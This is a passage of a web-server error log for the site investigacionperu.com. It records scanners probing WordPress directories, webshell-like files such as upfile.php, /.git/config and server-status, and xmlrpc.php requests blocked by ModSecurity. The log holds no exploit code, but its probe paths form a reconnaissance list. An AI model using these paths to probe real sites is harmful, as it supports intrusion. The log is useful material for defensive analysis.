/usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Fri Nov 22 03:12:17.744029 2024] [autoindex:error] [pid 2683:tid 140709201950464] [client 194.5.82.121:58012] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Fri Nov 22 03:12:28.965677 2024] [autoindex:error] [pid 2684:tid 140709227128576] [client 194.5.82.121:58032] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Fri Nov 22 03:12:31.675679 2024] [autoindex:error] [pid 2684:tid 140709317658368] [client 194.5.82.121:58038] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Fri Nov 22 03:12:43.355516 2024] [autoindex:error] [pid 2685:tid 140709168379648] [client 194.5.82.121:58058] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Fri Nov 22 03:12:43.564854 2024] [:error] [pid 2683:tid 140709059274496] [client 194.5.82.121:58060] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Fri Nov 22 03:12:58.187022 2024] [autoindex:error] [pid 13426:tid 140709067667200] [client 194.5.82.121:58086] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Fri Nov 22 03:13:02.702139 2024] [:error] [pid 13426:tid 140709227128576] [client 194.5.82.121:58098] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Fri Nov 22 03:13:05.420770 2024] [autoindex:error] [pid 2683:tid 140709235521280] [client 194.5.82.121:58104] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Fri Nov 22 03:13:17.710088 2024] [autoindex:error] [pid 3255:tid 140709218735872] [client 194.5.82.121:58124] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Fri Nov 22 03:13:38.005929 2024] [:error] [pid 2683:tid 140709317658368] [client 194.5.82.121:58156] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Fri Nov 22 03:13:44.336387 2024] [autoindex:error] [pid 2684:tid 140709201950464] [client 194.5.82.121:58168] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Nov 22 03:13:49.213555 2024] [autoindex:error] [pid 13426:tid 140709092845312] [client 194.5.82.121:58178] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Fri Nov 22 03:13:59.102622 2024] [autoindex:error] [pid 13426:tid 140709218735872] [client 194.5.82.121:58202] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Fri Nov 22 03:15:50.510842 2024] [autoindex:error] [pid 13426:tid 140709143201536] [client 194.5.82.121:58400] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Nov 22 03:15:50.726395 2024] [:error] [pid 2683:tid 140709185165056] [client 194.5.82.121:58402] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Fri Nov 22 06:59:30.685387 2024] [authz_core:error] [pid 23339:tid 139714564691712] [client 134.122.28.88:35022] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/22 06:59:34 [error] 23204#23204: *53489 access forbidden by rule, client: 134.122.28.88, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Nov 22 07:30:47.787134 2024] [authz_core:error] [pid 23338:tid 139714581477120] [client 206.81.24.227:35658] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/22 07:30:54 [error] 23205#23205: *53899 access forbidden by rule, client: 206.81.24.227, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/11/22 09:27:37 [error] 23204#23204: *55282 access forbidden by rule, client: 18.175.175.158, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/11/22 09:34:27 [error] 23204#23204: *55533 access forbidden by rule, client: 18.175.175.158, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/11/22 09:36:50 [error] 23205#23205: *55585 access forbidden by rule, client: 18.175.175.158, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/22 09:48:37 [error] 23204#23204: *55935 access forbidden by rule, client: 18.175.175.158, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/11/22 09:54:22 [error] 23205#23205: *56163 access forbidden by rule, client: 18.175.175.158, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Nov 22 09:55:37.218192 2024] [:error] [pid 23339:tid 139714497550080] [client 5.188.62.140:40084] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0CbaazDIVvUZj_END-1DwAAAFA"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:02:17.518827 2024] [:error] [pid 23932:tid 139714573084416] [client 5.188.62.140:40516] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0Cc-WUnpbi0SE1xThYKwQAAAMc"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:06:39.558416 2024] [:error] [pid 23932:tid 139714547906304] [client 5.188.62.174:40756] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0Cd_2Unpbi0SE1xThYK7QAAAMo"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:06:40.193096 2024] [:error] [pid 23339:tid 139714606655232] [client 5.188.62.174:40760] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0CeAKzDIVvUZj_END-1NwAAAEM"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:18:39.587671 2024] [:error] [pid 23932:tid 139714539513600] [client 5.188.62.26:41492] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0Cgz2Unpbi0SE1xThYLSwAAAMs"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:18:41.509916 2024] [:error] [pid 23340:tid 139714564691712] [client 5.188.62.26:41498] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0Cg0U3EDxWKQJnR9eEe5AAAAIg"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:18:41.932059 2024] [:error] [pid 23339:tid 139714705200896] [client 5.188.62.26:41500] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0Cg0azDIVvUZj_END-1cAAAAEA"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:18:42.478457 2024] [:error] [pid 23340:tid 139714598262528] [client 5.188.62.26:41502] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0Cg0k3EDxWKQJnR9eEe5QAAAIQ"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:47:24.782330 2024] [:error] [pid 23932:tid 139714556299008] [client 5.188.62.21:43270] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0CnjGUnpbi0SE1xThYMHgAAAMk"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:47:24.937912 2024] [:error] [pid 23932:tid 139714696808192] [client 5.188.62.21:43272] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0CnjGUnpbi0SE1xThYMHwAAAME"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:47:25.344602 2024] [:error] [pid 23340:tid 139714463979264] [client 5.188.62.21:43274] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0CnjU3EDxWKQJnR9eEfhgAAAJQ"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:47:25.944735 2024] [:error] [pid 23932:tid 139714589869824] [client 5.188.62.76:43276] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0CnjWUnpbi0SE1xThYMIAAAAMU"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:47:26.569556 2024] [:error] [pid 23932:tid 139714581477120] [client 5.188.62.76:43278] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0CnjmUnpbi0SE1xThYMIQAAAMY"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:47:27.037985 2024] [:error] [pid 23339:tid 139714505942784] [client 5.188.62.76:43280] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0Cnj6zDIVvUZj_END-1yAAAAE8"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:49:21.766904 2024] [:error] [pid 23932:tid 139714539513600] [client 5.188.62.140:43394] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0CoAWUnpbi0SE1xThYMNQAAAMs"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:53:15.886731 2024] [:error] [pid 23932:tid 139714615047936] [client 5.188.62.21:43670] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0Co62Unpbi0SE1xThYMXAAAAMI"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:53:26.425823 2024] [:error] [pid 23340:tid 139714455586560] [client 5.188.62.76:43690] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0Co9k3EDxWKQJnR9eEfpAAAAJU"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:56:45.755928 2024] [:error] [pid 23339:tid 139714606655232] [client 5.188.62.140:44030] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0CpvazDIVvUZj_END-16wAAAEM"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 10:58:53.365416 2024] [:error] [pid 23932:tid 139714497550080] [client 5.188.62.174:44154] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0CqPWUnpbi0SE1xThYMkwAAANA"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 11:06:12.793698 2024] [:error] [pid 23932:tid 139714531120896] [client 5.188.62.174:44534] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0Cr9GUnpbi0SE1xThYM0gAAAMw"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 11:13:18.163534 2024] [:error] [pid 23340:tid 139714556299008] [client 5.188.62.26:44838] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0Ctnk3EDxWKQJnR9eEf9AAAAIk"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 11:13:18.616501 2024] [:error] [pid 23340:tid 139714531120896] [client 5.188.62.26:44840] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0Ctnk3EDxWKQJnR9eEf9QAAAIw"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 11:44:15.947757 2024] [:error] [pid 23340:tid 139714447193856] [client 5.188.62.21:46646] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0C0303EDxWKQJnR9eEgbwAAAJY"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 11:44:16.416172 2024] [:error] [pid 23932:tid 139714472371968] [client 